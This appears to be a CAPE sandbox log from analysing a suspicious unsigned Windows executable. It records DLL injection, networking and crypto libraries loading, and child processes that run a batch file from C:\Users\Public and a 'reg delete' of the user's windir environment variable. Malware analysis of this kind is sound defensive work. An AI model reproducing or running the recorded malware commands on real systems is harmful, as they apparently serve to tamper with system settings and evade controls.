Analysis

Category Package Started Completed Duration Options Log
FILE exe 2020-03-24 10:13:01 2020-03-24 10:17:21 260 seconds Show Options Show Log
procmemdump = 1
import_reconstruction = 1
procdump = 1
route = internet
2020-03-24 10:13:02,000 [root] INFO: Date set to: 03-24-20, time set to: 10:13:02, timeout set to: 200
2020-03-24 10:13:02,108 [root] DEBUG: Starting analyzer from: C:\lwhhhat
2020-03-24 10:13:02,108 [root] DEBUG: Storing results at: C:\uGrmFZ
2020-03-24 10:13:02,108 [root] DEBUG: Pipe server name: \\.\PIPE\pOpDnJNJHI
2020-03-24 10:13:02,108 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-03-24 10:13:02,108 [root] INFO: Automatically selected analysis package "exe"
2020-03-24 10:13:05,775 [root] DEBUG: Started auxiliary module Browser
2020-03-24 10:13:05,775 [root] DEBUG: Started auxiliary module Curtain
2020-03-24 10:13:05,775 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2020-03-24 10:13:08,348 [modules.auxiliary.digisig] DEBUG: File is not signed.
2020-03-24 10:13:08,348 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-03-24 10:13:08,348 [root] DEBUG: Started auxiliary module DigiSig
2020-03-24 10:13:08,348 [root] DEBUG: Started auxiliary module Disguise
2020-03-24 10:13:08,348 [root] DEBUG: Started auxiliary module Human
2020-03-24 10:13:08,348 [root] DEBUG: Started auxiliary module Screenshots
2020-03-24 10:13:08,348 [root] DEBUG: Started auxiliary module Sysmon
2020-03-24 10:13:08,348 [root] DEBUG: Started auxiliary module Usage
2020-03-24 10:13:08,348 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2020-03-24 10:13:08,348 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2020-03-24 10:13:08,411 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\iz3Ehm6t.exe" with arguments "" with pid 1964
2020-03-24 10:13:08,411 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:08,411 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:08,411 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:08,411 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:08,519 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:08,519 [root] DEBUG: Loader: Injecting process 1964 (thread 420) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:08,536 [root] DEBUG: Process image base: 0x00400000
2020-03-24 10:13:08,536 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:08,536 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 10:13:08,536 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:08,536 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1964
2020-03-24 10:13:10,548 [lib.api.process] INFO: Successfully resumed process with pid 1964
2020-03-24 10:13:10,548 [root] INFO: Added new process to list with pid: 1964
2020-03-24 10:13:10,891 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 10:13:10,891 [root] DEBUG: Full process memory dumps enabled.
2020-03-24 10:13:10,891 [root] DEBUG: Import reconstruction of process dumps enabled.
2020-03-24 10:13:10,891 [root] DEBUG: Process dumps enabled.
2020-03-24 10:13:11,125 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:11,125 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:11,125 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 10:13:11,125 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:11,125 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:11,125 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1964 at 0x74880000, image base 0x400000, stack from 0x186000-0x190000
2020-03-24 10:13:11,125 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\iz3Ehm6t.exe".
2020-03-24 10:13:11,125 [root] INFO: Monitor successfully loaded in process with pid 1964.
2020-03-24 10:13:11,125 [root] DEBUG: set_caller_info: Adding region at 0x03660000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 10:13:12,046 [root] DEBUG: set_caller_info: Adding region at 0x03F60000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 10:13:12,062 [root] DEBUG: set_caller_info: Adding region at 0x040E0000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 10:13:12,062 [root] DEBUG: set_caller_info: Adding region at 0x046B0000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 10:13:12,092 [root] DEBUG: set_caller_info: Adding region at 0x04830000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 10:13:12,140 [root] DEBUG: set_caller_info: Adding region at 0x04940000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 10:13:12,201 [root] DEBUG: set_caller_info: Adding region at 0x04A40000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 10:13:12,249 [root] DEBUG: set_caller_info: Adding region at 0x04B40000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 10:13:12,358 [root] DEBUG: set_caller_info: Adding region at 0x04A50000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 10:13:12,763 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\shell32 (0xc4a000 bytes).
2020-03-24 10:13:12,997 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\syswow64\URLMON (0x136000 bytes).
2020-03-24 10:13:13,496 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2020-03-24 10:13:13,621 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2020-03-24 10:13:13,714 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2020-03-24 10:13:13,714 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2020-03-24 10:13:13,792 [root] DEBUG: set_caller_info: Adding region at 0x035A0000 to caller regions list (ntdll::memcpy).
2020-03-24 10:13:13,792 [root] DEBUG: set_caller_info: Adding region at 0x04B60000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 10:13:13,792 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 10:13:14,058 [root] INFO: Announced 32-bit process name: cmd.exe pid: 1340
2020-03-24 10:13:14,058 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:14,058 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:14,058 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:14,058 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:14,073 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:14,073 [root] DEBUG: Loader: Injecting process 1340 (thread 2288) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,073 [root] DEBUG: Process image base: 0x4A1A0000
2020-03-24 10:13:14,073 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,073 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 10:13:14,073 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,073 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1340
2020-03-24 10:13:14,073 [root] INFO: Announced 32-bit process name: cmd.exe pid: 1340
2020-03-24 10:13:14,073 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:14,073 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:14,073 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:14,073 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:14,073 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:14,073 [root] DEBUG: Loader: Injecting process 1340 (thread 2288) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,073 [root] DEBUG: Process image base: 0x4A1A0000
2020-03-24 10:13:14,073 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,073 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:14,073 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,073 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1340
2020-03-24 10:13:14,089 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 10:13:14,089 [root] DEBUG: Full process memory dumps enabled.
2020-03-24 10:13:14,089 [root] DEBUG: Import reconstruction of process dumps enabled.
2020-03-24 10:13:14,089 [root] DEBUG: Process dumps enabled.
2020-03-24 10:13:14,089 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:14,105 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 10:13:14,105 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1340 at 0x74880000, image base 0x4a1a0000, stack from 0x363000-0x460000
2020-03-24 10:13:14,105 [root] DEBUG: Commandline: C:\Users\Public\cmd \c ""C:\Users\Public\Natso.bat" ".
2020-03-24 10:13:14,105 [root] INFO: Added new process to list with pid: 1340
2020-03-24 10:13:14,105 [root] INFO: Monitor successfully loaded in process with pid 1340.
2020-03-24 10:13:14,369 [root] INFO: Announced 32-bit process name: reg.exe pid: 2352
2020-03-24 10:13:14,369 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:14,369 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:14,369 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:14,369 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:14,369 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:14,369 [root] DEBUG: Loader: Injecting process 2352 (thread 2216) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,369 [root] DEBUG: Process image base: 0x00E30000
2020-03-24 10:13:14,369 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,369 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 10:13:14,369 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,369 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2352
2020-03-24 10:13:14,385 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 10:13:14,401 [root] INFO: Announced 32-bit process name: reg.exe pid: 2352
2020-03-24 10:13:14,401 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:14,401 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:14,401 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:14,401 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:14,401 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:14,401 [root] DEBUG: Loader: Injecting process 2352 (thread 2216) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,401 [root] DEBUG: Process image base: 0x00E30000
2020-03-24 10:13:14,401 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,401 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:14,401 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,401 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2352
2020-03-24 10:13:14,588 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 10:13:14,588 [root] DEBUG: Full process memory dumps enabled.
2020-03-24 10:13:14,588 [root] DEBUG: Import reconstruction of process dumps enabled.
2020-03-24 10:13:14,588 [root] DEBUG: Process dumps enabled.
2020-03-24 10:13:14,588 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:14,713 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 10:13:14,713 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2352 at 0x74880000, image base 0xe30000, stack from 0x206000-0x210000
2020-03-24 10:13:14,713 [root] DEBUG: Commandline: C:\Users\Public\reg  delete hkcu\Environment \v windir \f.
2020-03-24 10:13:14,713 [root] INFO: Added new process to list with pid: 2352
2020-03-24 10:13:14,713 [root] INFO: Monitor successfully loaded in process with pid 2352.
2020-03-24 10:13:14,713 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2352
2020-03-24 10:13:14,713 [root] DEBUG: GetHookCallerBase: thread 2216 (handle 0x0), return address 0x00E31CAD, allocation base 0x00E30000.
2020-03-24 10:13:14,713 [root] DEBUG: DoProcessDump: Created dump file for full process memory dump: C:\uGrmFZ\memory\2352.dmp.
2020-03-24 10:13:14,931 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00E30000.
2020-03-24 10:13:14,931 [root] DEBUG: ApiReader: module list size: 20
2020-03-24 10:13:14,931 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,931 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
